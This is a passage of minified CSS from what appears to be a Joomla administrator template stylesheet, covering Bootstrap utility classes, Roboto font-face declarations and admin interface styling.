ding-bottom:1rem!important}.pb-xl-4{padding-bottom:1.5rem!important}.pb-xl-5{padding-bottom:3rem!important}.ps-xl-0{padding-left:0!important}.ps-xl-1{padding-left:.25rem!important}.ps-xl-2{padding-left:.5rem!important}.ps-xl-3{padding-left:1rem!important}.ps-xl-4{padding-left:1.5rem!important}.ps-xl-5{padding-left:3rem!important}.text-xl-start{text-align:left!important}.text-xl-end{text-align:right!important}.text-xl-center{text-align:center!important}}@media (min-width:1400px){.float-xxl-start{float:left!important}.float-xxl-end{float:right!important}.float-xxl-none{float:none!important}.d-xxl-inline{display:inline!important}.d-xxl-inline-block{display:inline-block!important}.d-xxl-block{display:block!important}.d-xxl-grid{display:grid!important}.d-xxl-table{display:table!important}.d-xxl-table-row{display:table-row!important}.d-xxl-table-cell{display:table-cell!important}.d-xxl-flex{display:flex!important}.d-xxl-inline-flex{display:inline-flex!important}.d-xxl-none{display:none!important}.flex-xxl-fill{flex:1 1 auto!important}.flex-xxl-row{flex-direction:row!important}.flex-xxl-column{flex-direction:column!important}.flex-xxl-row-reverse{flex-direction:row-reverse!important}.flex-xxl-column-reverse{flex-direction:column-reverse!important}.flex-xxl-grow-0{flex-grow:0!important}.flex-xxl-grow-1{flex-grow:1!important}.flex-xxl-shrink-0{flex-shrink:0!important}.flex-xxl-shrink-1{flex-shrink:1!important}.flex-xxl-wrap{flex-wrap:wrap!important}.flex-xxl-nowrap{flex-wrap:nowrap!important}.flex-xxl-wrap-reverse{flex-wrap:wrap-reverse!important}.gap-xxl-0{gap:0!important}.gap-xxl-1{gap:.25rem!important}.gap-xxl-2{gap:.5rem!important}.gap-xxl-3{gap:1rem!important}.gap-xxl-4{gap:1.5rem!important}.gap-xxl-5{gap:3rem!important}.justify-content-xxl-start{justify-content:flex-start!important}.justify-content-xxl-end{justify-content:flex-end!important}.justify-content-xxl-center{justify-content:center!important}.justify-content-xxl-between{justify-content:space-between!important}.justify-content-xxl-around{justify-content:space-around!important}.justify-content-xxl-evenly{justify-content:space-evenly!important}.align-items-xxl-start{align-items:flex-start!important}.align-items-xxl-end{align-items:flex-end!important}.align-items-xxl-center{align-items:center!important}.align-items-xxl-baseline{align-items:baseline!important}.align-items-xxl-stretch{align-items:stretch!important}.align-content-xxl-start{align-content:flex-start!important}.align-content-xxl-end{align-content:flex-end!important}.align-content-xxl-center{align-content:center!important}.align-content-xxl-between{align-content:space-between!important}.align-content-xxl-around{align-content:space-around!important}.align-content-xxl-stretch{align-content:stretch!important}.align-self-xxl-auto{align-self:auto!important}.align-self-xxl-start{align-self:flex-start!important}.align-self-xxl-end{align-self:flex-end!important}.align-self-xxl-center{align-self:center!important}.align-self-xxl-baseline{align-self:baseline!important}.align-self-xxl-stretch{align-self:stretch!important}.order-xxl-first{order:-1!important}.order-xxl-0{order:0!important}.order-xxl-1{order:1!important}.order-xxl-2{order:2!important}.order-xxl-3{order:3!important}.order-xxl-4{order:4!important}.order-xxl-5{order:5!important}.order-xxl-last{order:6!important}.m-xxl-0{margin:0!important}.m-xxl-1{margin:.25rem!important}.m-xxl-2{margin:.5rem!important}.m-xxl-3{margin:1rem!important}.m-xxl-4{margin:1.5rem!important}.m-xxl-5{margin:3rem!important}.m-xxl-auto{margin:auto!important}.mx-xxl-0{margin-right:0!important;margin-left:0!important}.mx-xxl-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-xxl-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-xxl-3{margin-right:1rem!important;margin-left:1rem!important}.mx-xxl-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-xxl-5{margin-right:3rem!important;margin-left:3rem!important}.mx-xxl-auto{margin-right:auto!important;margin-left:auto!important}.my-xxl-0{margin-top:0!important;margin-bottom:0!important}.my-xxl-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-xxl-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-xxl-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-xxl-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-xxl-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-xxl-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-xxl-0{margin-top:0!important}.mt-xxl-1{margin-top:.25rem!important}.mt-xxl-2{margin-top:.5rem!important}.mt-xxl-3{margin-top:1rem!important}.mt-xxl-4{margin-top:1.5rem!important}.mt-xxl-5{margin-top:3rem!important}.mt-xxl-auto{margin-top:auto!important}.me-xxl-0{margin-right:0!important}.me-xxl-1{margin-right:.25rem!important}.me-xxl-2{margin-right:.5rem!important}.me-xxl-3{margin-right:1rem!important}.me-xxl-4{margin-right:1.5rem!important}.me-xxl-5{margin-right:3rem!important}.me-xxl-auto{margin-right:auto!important}.mb-xxl-0{margin-bottom:0!important}.mb-xxl-1{margin-bottom:.25rem!important}.mb-xxl-2{margin-bottom:.5rem!important}.mb-xxl-3{margin-bottom:1rem!important}.mb-xxl-4{margin-bottom:1.5rem!important}.mb-xxl-5{margin-bottom:3rem!important}.mb-xxl-auto{margin-bottom:auto!important}.ms-xxl-0{margin-left:0!important}.ms-xxl-1{margin-left:.25rem!important}.ms-xxl-2{margin-left:.5rem!important}.ms-xxl-3{margin-left:1rem!important}.ms-xxl-4{margin-left:1.5rem!important}.ms-xxl-5{margin-left:3rem!important}.ms-xxl-auto{margin-left:auto!important}.p-xxl-0{padding:0!important}.p-xxl-1{padding:.25rem!important}.p-xxl-2{padding:.5rem!important}.p-xxl-3{padding:1rem!important}.p-xxl-4{padding:1.5rem!important}.p-xxl-5{padding:3rem!important}.px-xxl-0{padding-right:0!important;padding-left:0!important}.px-xxl-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-xxl-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-xxl-3{padding-right:1rem!important;padding-left:1rem!important}.px-xxl-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-xxl-5{padding-right:3rem!important;padding-left:3rem!important}.py-xxl-0{padding-top:0!important;padding-bottom:0!important}.py-xxl-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-xxl-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-xxl-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-xxl-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-xxl-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-xxl-0{padding-top:0!important}.pt-xxl-1{padding-top:.25rem!important}.pt-xxl-2{padding-top:.5rem!important}.pt-xxl-3{padding-top:1rem!important}.pt-xxl-4{padding-top:1.5rem!important}.pt-xxl-5{padding-top:3rem!important}.pe-xxl-0{padding-right:0!important}.pe-xxl-1{padding-right:.25rem!important}.pe-xxl-2{padding-right:.5rem!important}.pe-xxl-3{padding-right:1rem!important}.pe-xxl-4{padding-right:1.5rem!important}.pe-xxl-5{padding-right:3rem!important}.pb-xxl-0{padding-bottom:0!important}.pb-xxl-1{padding-bottom:.25rem!important}.pb-xxl-2{padding-bottom:.5rem!important}.pb-xxl-3{padding-bottom:1rem!important}.pb-xxl-4{padding-bottom:1.5rem!important}.pb-xxl-5{padding-bottom:3rem!important}.ps-xxl-0{padding-left:0!important}.ps-xxl-1{padding-left:.25rem!important}.ps-xxl-2{padding-left:.5rem!important}.ps-xxl-3{padding-left:1rem!important}.ps-xxl-4{padding-left:1.5rem!important}.ps-xxl-5{padding-left:3rem!important}.text-xxl-start{text-align:left!important}.text-xxl-end{text-align:right!important}.text-xxl-center{text-align:center!important}}@media (min-width:1200px){.fs-1{font-size:1.65rem!important}.fs-2{font-size:1.5rem!important}}@media print{.d-print-inline{display:inline!important}.d-print-inline-block{display:inline-block!important}.d-print-block{display:block!important}.d-print-grid{display:grid!important}.d-print-table{display:table!important}.d-print-table-row{display:table-row!important}.d-print-table-cell{display:table-cell!important}.d-print-flex{display:flex!important}.d-print-inline-flex{display:inline-flex!important}.d-print-none{display:none!important}}.clearfix:after{display:block;clear:both;content:""}.link-primary{color:#132f53}.link-primary:focus,.link-primary:hover{color:#0f2642}.link-secondary{color:#495057}.link-secondary:focus,.link-secondary:hover{color:#3a4046}.link-success{color:#457d54}.link-success:focus,.link-success:hover{color:#376443}.link-info{color:#2a69b8}.link-info:focus,.link-info:hover{color:#225493}.link-warning{color:#ffb514}.link-warning:focus,.link-warning:hover{color:#ffc443}.link-danger{color:#c52827}.link-danger:focus,.link-danger:hover{color:#9e201f}.link-light{color:#f8f9fa}.link-light:focus,.link-light:hover{color:#f9fafb}.link-dark{color:#212529}.link-dark:focus,.link-dark:hover{color:#1a1e21}.link-atum-link-color{color:#2a69b8}.link-atum-link-color:focus,.link-atum-link-color:hover{color:#225493}.link-atum-text-dark{color:#495057}.link-atum-text-dark:focus,.link-atum-text-dark:hover{color:#3a4046}.link-action{color:#132f53}.link-action:focus,.link-action:hover{color:#0f2642}.link-error{color:#3b0d0c}.link-error:focus,.link-error:hover{color:#2f0a0a}.link-alert-success{color:#0f2f21}.link-alert-success:focus,.link-alert-success:hover{color:#0c261a}.ratio{position:relative;width:100%}.ratio:before{display:block;padding-top:var(--aspect-ratio);content:""}.ratio>*{position:absolute;top:0;left:0;width:100%;height:100%}.ratio-1x1{--aspect-ratio:100%}.ratio-4x3{--aspect-ratio:75%}.ratio-16x9{--aspect-ratio:56.25%}.ratio-21x9{--aspect-ratio:42.85714%}.fixed-top{top:0}.fixed-bottom,.fixed-top{position:fixed;right:0;left:0;z-index:1030}.fixed-bottom{bottom:0}.sticky-top{position:sticky;top:0;z-index:1020}@media (min-width:576px){.sticky-sm-top{position:sticky;top:0;z-index:1020}}@media (min-width:768px){.sticky-md-top{position:sticky;top:0;z-index:1020}}@media (min-width:992px){.sticky-lg-top{position:sticky;top:0;z-index:1020}}@media (min-width:1200px){.sticky-xl-top{position:sticky;top:0;z-index:1020}}@media (min-width:1400px){.sticky-xxl-top{position:sticky;top:0;z-index:1020}}.sr-only,.visually-hidden,.visually-hidden-focusable:not(:focus):not(:focus-within){position:absolute!important;width:1px!important;height:1px!important;padding:0!important;margin:-1px!important;overflow:hidden!important;clip:rect(0,0,0,0)!important;white-space:nowrap!important;border:0!important}.stretched-link:after{position:absolute;top:0;right:0;bottom:0;left:0;z-index:1;content:""}.text-truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff) format("woff");font-weight:400;font-style:normal}@font-face{font-family:Roboto-Regular;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff) format("woff");font-weight:400;font-style:italic}@font-face{font-family:Roboto-RegularItalic;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff) format("woff");font-weight:300;font-style:normal}@font-face{font-family:Roboto-Light;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff) format("woff");font-weight:300;font-style:italic}@font-face{font-family:Roboto-LightItalic;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff) format("woff");font-weight:100;font-style:normal}@font-face{font-family:Roboto-Thin;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff) format("woff");font-weight:100;font-style:italic}@font-face{font-family:Roboto-ThinItalic;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff) format("woff");font-weight:500;font-style:normal}@font-face{font-family:Roboto-Medium;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff) format("woff");font-weight:500;font-style:italic}@font-face{font-family:Roboto-MediumItalic;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff) format("woff");font-weight:700;font-style:normal}@font-face{font-family:Roboto-Bold;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff) format("woff");font-weight:700;font-style:italic}@font-face{font-family:Roboto-BoldItalic;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff) format("woff");font-weight:900;font-style:normal}@font-face{font-family:Roboto-Black;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff) format("woff");font-weight:900;font-style:italic}@font-face{font-family:Roboto-BlackItalic;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff) format("woff")}html{height:100%}html.a11y_font{font-size:18px}body{display:flex;flex-direction:column;min-height:100%;padding:0;margin:0;text-align:start}body.admin{background-color:var(--template-bg-dark-5)}body.monochrome{-webkit-filter:grayscale(1);filter:grayscale(1)}body.monochrome:after{position:fixed;top:0;left:0;z-index:-1;width:100%;height:100%;content:"";background:var(--template-bg-dark-5)}body.a11y_contrast{-webkit-filter:contrast(115%);filter:contrast(115%)}body.monochrome.a11y_contrast{-webkit-filter:grayscale(1) contrast(115%);filter:grayscale(1) contrast(115%)}body.a11y_highlight .header-item-content,body.a11y_highlight a{padding:3px;text-decoration:underline!important;border:1px dotted red}body.a11y_highlight .joomlaversion{padding:0;text-decoration:none!important;border:none}body.a11y_highlight a.page-link{padding:.375rem .75rem}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{font-weight:700}.h1,h1{font-weight:400}.small,small{font-size:.8rem}legend{font-size:1.2rem;font-weight:700}.js-focus-visible :focus:not(.focus-visible){outline:none}a.focus-visible,button.focus-visible,input.focus-visible,textarea.focus-visible{outline:auto 2px var(--focus)}.break-word{word-break:break-all;word-wrap:break-word}caption,label{font-size:1rem;text-align:start}.logo img path{fill:var(--template-text-dark)}.container-main,.system-debug{padding-bottom:50px}body .container-main{order:1;position:relative;padding-right:0;padding-left:0}.content{padding:1rem}@media (min-width:768px){.content{padding:0 2rem}.subhead+.content{padding-top:0}}body:not(.contentpane) .main-card{background:#fff;border-radius:.25rem;box-shadow:0 2px 10px -8px var(--template-bg-dark-50)}.row-selected{background-color:var(--toolbar-bg)}.chzn-container-single{width:auto!important}.input-group input{min-width:220px}.item-associations{padding:0}.item-associations li{display:inline-block;margin-bottom:3px;list-style:none}.message-alert{text-align:end!important}a[target=_blank]:before{-webkit-padding-end:3px;padding-inline-end:3px;font-family:Font Awesome\ 5 Free;font-size:14px;font-weight:900;content:""}@media (max-width:575.98px){#wrapper.d-flex{display:block!important}}.text-muted{color:var(--template-text-dark)!important;opacity:.7}.card-columns{display:grid;grid-gap:0 15px;grid-template-columns:1fr}@media (min-width:768px){.card-columns{grid-template-columns:1fr 1fr}}@media (min-width:768px){.cpanel-help .card-columns,.cpanel-system .card-columns{grid-template-columns:1fr 1fr 1fr}}.tiny{font-size:.6rem;line-height:1.4rem}details{padding:.5rem 1rem;margin:0 0 2rem;background:var(--template-bg-dark-3);border:1px solid var(--template-bg-dark-10);border-radius:.25rem}details summary{color:var(--template-link-color)}details summary~*{margin-top:1rem}meter{width:100%}@media (min-width:768px){joomla-tab[orientation=horizontal]:not([view=accordion]) section>.row{--gutter-x:4rem}joomla-tab[orientation=horizontal]:not([view=accordion]) section>.row>*+*{-webkit-border-start:1px solid var(--template-bg-dark-10);border-inline-start:1px solid var(--template-bg-dark-10)}}.minicolors-theme-bootstrap .minicolors-swatch{width:36px;height:36px}.minicolors-theme-bootstrap .minicolors-swatch>.minicolors-sprite{top:50%;left:8px;border-radius:0;-webkit-transform:translateY(-50%);transform:translateY(-50%)}span.minicolors-swatch-color{cursor:pointer}@media (max-width:767.98px){.badge{white-space:normal}}.badge.bg-secondary:hover{color:#fff}.btn{transition:none}@media (max-width:575.98px){.btn{margin-bottom:.25rem}.input-group .btn{margin-bottom:0}}.btn-primary{color:var(--template-text-light);background-color:var(--template-bg-dark-60);border-color:var(--template-bg-dark-60)}.btn-primary:active,.btn-primary:focus,.btn-primary:hover{background-color:var(--template-bg-dark-70);border-color:var(--template-bg-dark-90)}.btn-primary:not(:disabled):not(.disabled).active,.btn-primary:not(:disabled):not(.disabled):active,.show>.btn-primary.dropdown-toggle{background-color:var(--template-bg-dark);border-color:var(--template-bg-dark)}.btn-secondary{background-color:var(--template-bg-dark-60);border-color:var(--template-bg-dark-60)}.input-group-text{background-color:var(--template-bg-dark);border-color:var(--template-bg-dark)}.card-columns .card{margin-bottom:1rem}@media (min-width:576px){.card-columns{-webkit-column-count:3;-moz-column-count:3;column-count:3;-webkit-column-gap:1.25rem;-moz-column-gap:1.25rem;column-gap:1.25rem;orphans:1;widows:1}.card-columns .card{display:inline-block;width:100%}}.content .card{box-shadow:0 2px 10px -8px var(--template-bg-dark-50)}.content .card-header{display:flex;padding:1rem 1rem .75rem;font-weight:700;color:var(--template-bg-dark);background:var(--card-bg)}.content .card-header>[class^=icon-],.content .card-header>img{-webkit-margin-end:.5rem;margin-inline-end:.5rem}.custom-select,.form-select{max-width:100%;cursor:pointer;background:url(../images/select-bg.svg) no-repeat 100%/116rem;background-color:var(--template-bg-light);border:1px solid var(--template-bg-dark-20)}[dir=rtl] .custom-select,[dir=rtl] .form-select{padding:.5rem 1rem .5rem 4rem;background:url(../images/select-bg-rtl.svg) no-repeat 0/116rem;background-color:var(--template-bg-light)}.form-select[multiple],[multiple].custom-select{padding:0;background-color:var(--white-offset)}.form-select[multiple] option,[multiple].custom-select option{padding:.3rem 1rem;background-color:var(--white-offset)}.form-select[multiple] option:checked,[multiple].custom-select option:checked{color:var(--template-text-light);background-color:var(--template-bg-dark)!important}.custom-select-success.custom-select,.form-select-success.custom-select,.form-select.custom-select-success,.form-select.form-select-success{color:var(--success);background-color:var(--success);border-color:var(--success)}.custom-select-success.custom-select option,.form-select-success.custom-select option,.form-select.custom-select-success option,.form-select.form-select-success option{color:var(--template-text-dark);background-color:var(--white-offset)}.custom-select-danger.custom-select,.form-select-danger.custom-select,.form-select.custom-select-danger,.form-select.form-select-danger{color:var(--danger);background-color:var(--danger);border-color:var(--danger)}.custom-select-danger.custom-select option,.form-select-danger.custom-select option,.form-select.custom-select-danger option,.form-select.form-select-danger option{color:var(--template-text-dark);background-color:var(--white-offset)}.custom-select:focus,.form-select:focus{border-color:#39f;box-shadow:0 0 0 .2rem #eaeaea}.custom-select:disabled,.form-select:disabled{cursor:default;background:#e8e8e8;border:0;box-shadow:none}.custom-select optgroup,.custom-select option,.form-select optgroup,.form-select option{color:var(--template-text-dark);background-color:#fff}.accordion .card-header{display:block;font-size:.9286rem;font-weight:700;line-height:1.2}.accordion .list-group-item{color:var(--template-link-color)}.btn-group .dropdown-menu{min-width:100%;background:#fff;box-shadow:0 1px 1px rgba(0,0,0,.15)}.btn-group .dropdown-menu joomla-toolbar-button{text-align:start;border:0}.dropdown-menu{box-shadow:0 2px 10px -8px var(--template-bg-dark-50)}.dropdown-item{text-align:start;border-bottom:1px solid rgba(0,0,0,.1)}.btn-primary+.dropdown-menu .dropdown-item:focus,.btn-primary+.dropdown-menu .dropdown-item:hover{background-color:var(--template-bg-dark)}.btn-secondary+.dropdown-menu .dropdown-item:focus,.btn-secondary+.dropdown-menu .dropdown-item:hover{color:var(--template-text-light);background-color:var(--secondary)}.btn-danger+.dropdown-menu .dropdown-item:focus,.btn-danger+.dropdown-menu .dropdown-item:hover{background-color:var(--danger)}.btn-info+.dropdown-menu .dropdown-item:focus,.btn-info+.dropdown-menu .dropdown-item:hover{background-color:var(--info)}.dropdown-status-group .dropdown-menu .dropdown-item:focus:not(.disabled),.dropdown-status-group .dropdown-menu .dropdown-item:hover:not(.disabled){color:var(--template-text-light);background-color:var(--template-bg-dark)}.dropdown-save-group .dropdown-menu .dropdown-item:focus:not(.disabled),.dropdown-save-group .dropdown-menu .dropdown-item:hover:not(.disabled){color:var(--template-text-light);background-color:var(--success)}.dropdown-item+.dropdown-item{border-top:1px solid rgba(0,0,0,.1)}.dropdown-status-group .dropdown-menu .dropdown-item:not(.disabled){color:var(--action)}.dropdown-save-group .dropdown-menu .dropdown-item:not(.disabled){color:var(--success)}.dropdown-item.first:not(.last){border-bottom-right-radius:0;border-bottom-left-radius:0}.dropdown-item.last:not(.first){border-top-left-radius:0;border-top-right-radius:0}.dropdown-item:not(.first):not(.last):not(:only-of-type){border-radius:0}label{margin-bottom:0}legend{margin-bottom:1.1rem;font-size:1rem;font-weight:400}[aria-grabbed=true]{box-shadow:0 0 2px 1px var(--template-bg-dark)}select.form-control{background-color:var(--template-bg-light)}.field-media-wrapper{display:block;width:100%;max-width:calc(50vw - 5rem)}.field-media-wrapper .field-media-preview{width:100%;max-width:none}.field-media-wrapper .button-select{background-color:#366342}.field-media-wrapper .button-clear{background-color:#a32120}.field-media-wrapper .button-clear>.fa-check,.field-media-wrapper .button-select>.fa-times{color:#f8f9fa}@media (max-width:991.98px){.field-media-wrapper{min-width:100%}}.form-inline .custom-select,.form-inline .form-control,.form-inline .form-select{display:inline-block;width:auto}@media (max-width:767.98px){.form-inline .custom-select,.form-inline .form-control,.form-inline .form-select{width:100%}}.list-group-item{background-color:var(--white-offset)}.list-unstyled .list-unstyled{padding-left:20px}.jviewport-height10{height:10vh}.jviewport-height20{height:20vh}.jviewport-height30{height:30vh}.jviewport-height40{height:40vh}.jviewport-height50{height:50vh}.jviewport-height60{height:60vh}.jviewport-height70{height:70vh}.jviewport-height80{height:80vh}.jviewport-height90{height:90vh}.jviewport-height100{height:100vh}[class*=jviewport-height] iframe{height:100%}.modal-dialog.jviewport-width10{width:10vw}.modal-dialog.jviewport-width20{width:20vw;max-width:none}.modal-dialog.jviewport-width30{width:30vw;max-width:none}.modal-dialog.jviewport-width40{width:40vw;max-width:none}.modal-dialog.jviewport-width50{width:50vw;max-width:none}.modal-dialog.jviewport-width60{width:60vw;max-width:none}.modal-dialog.jviewport-width70{width:70vw;max-width:none}.modal-dialog.jviewport-width80{width:80vw;max-width:none}.modal-dialog.jviewport-width90{width:90vw;max-width:none}.modal-dialog.jviewport-width100{width:100vw;max-width:none}@media (max-width:767.98px){.modal-dialog{margin:1.75rem auto}}.modal-dialog .modal-body{padding:0}.pagination{margin:1rem}th{text-align:inherit;text-align:-webkit-match-parent}.table thead th{font-size:1rem}.table thead td,.table thead th{white-space:nowrap}.sysinfo .table thead td,.sysinfo .table thead th{white-space:normal}.table thead a{color:var(--template-link-color)}.table thead a#sorted{font-weight:500;color:#343a40}@media (max-width:767.98px){.table thead .actions,.table thead .actions-th1{width:28%}}.table tbody tr:active,.table tbody tr:focus,.table tbody tr:hover{background-color:rgba(0,0,0,.075)}.table tbody tr:last-of-type td,.table tbody tr:last-of-type th{border-bottom:0}.table tbody .itemnumber a.btn,.table tbody .itemnumber span.btn{padding:.1rem .5rem;text-decoration:none}.table tbody th{font-weight:500}.table tbody a:not(.badge){text-decoration:underline}.table td label,.table th label{margin-bottom:0}.table td .inactive [class*=" fa-"],.table td .inactive [class*=" icon-"],.table td .inactive [class^=fa-],.table td .inactive [class^=icon-],.table th .inactive [class*=" fa-"],.table th .inactive [class*=" icon-"],.table th .inactive [class^=fa-],.table th .inactive [class^=icon-]{color:#cdcdcd}.j-main-container>.table{box-shadow:0 2px 10px -8px var(--template-bg-dark-50)}.alert{margin:1rem 0;border-right:0;border-left:0;border-radius:.2rem}.alert.alert-info{color:var(--template-bg-dark);background-color:var(--template-bg-dark-10);border:1px solid var(--template-bg-dark-20)}.alert.alert-warning{color:#996900;background-color:#fffcf4;border:1px solid #ffb514}.alert.alert-success{color:#457d54;background-color:#f2f8f4;border:1px solid hsl(var(--hue),50%,93%)}.alert.alert-error{color:#c52827;background-color:#fef8f8;border:1px solid #c52827}.alert-parent{margin-top:0}fieldset .alert.alert-info{margin:-1rem 0 1rem}.alert-heading{font-size:1rem}@-webkit-keyframes fadeIn{0%{opacity:0;-webkit-transform:translateY(-15px);transform:translateY(-15px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeIn{0%{opacity:0;-webkit-transform:translateY(-15px);transform:translateY(-15px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}.title-alias .form-control{max-width:100%}.title-alias .form-control-feedback{position:absolute;right:1rem;bottom:-1.8rem;text-align:right}.layout-edit .title-alias .form-group{box-shadow:none}.header{z-index:1020;color:#fff;background:var(--template-bg-dark)}.header-inside{display:flex;min-height:54px}.header a{color:#fff}.header a:before{display:none}.header .logo{display:flex;flex-flow:row nowrap;align-items:center;width:18rem;height:100%;padding:12px 5px;overflow:hidden;background-color:var(--template-bg-dark-70);transition:all .3s ease-in-out}.header .logo.small{width:3rem;transition:all .3s ease-in-out}.header .logo.small img:not(.logo-collapsed),.header .logo.small svg:not(.logo-collapsed){display:none}.header .logo.small img.logo-collapsed,.header .logo.small svg.logo-collapsed{display:inline-block;width:20px;height:20px;-o-object-fit:contain;object-fit:contain;-o-object-position:center center;object-position:center center}.header .logo img,.header .logo svg{width:150px;height:30px;margin:0 .35rem;-o-object-fit:contain;object-fit:contain;-o-object-position:left center;object-position:left center}[dir=rtl] .header .logo img,[dir=rtl] .header .logo svg{-o-object-position:right center;object-position:right center}.header .logo img.logo-collapsed,.header .logo svg.logo-collapsed{display:none}.header .page-title{padding:0 1rem;margin:0;overflow:hidden;font-size:1.2rem;color:#fff;text-overflow:ellipsis;white-space:nowrap}.header .page-title>span{-webkit-margin-end:.25rem;margin-inline-end:.25rem}.header .dropdown-menu{font-size:.85rem}.header .dropdown-header,.header .dropdown-item{padding:.82rem .75rem;color:#fff;background-color:var(--template-bg-dark-70)}.header .dropdown-header>span,.header .dropdown-item>span{-webkit-margin-end:.5rem;margin-inline-end:.5rem}.header .dropdown-header,.header .dropdown-header:hover,.header .dropdown-item:hover{background-color:var(--template-bg-dark)}.header .dropdown-header{padding:.75rem;font-size:inherit}.header-items{align-items:center;justify-content:flex-end;width:50%;margin:15px;-webkit-margin-start:auto;margin-inline-start:auto}.header-items .dropdown-toggle{background-color:transparent;border:0}.header-items .dropdown-toggle:after{display:none}.header-item{position:relative;margin:0 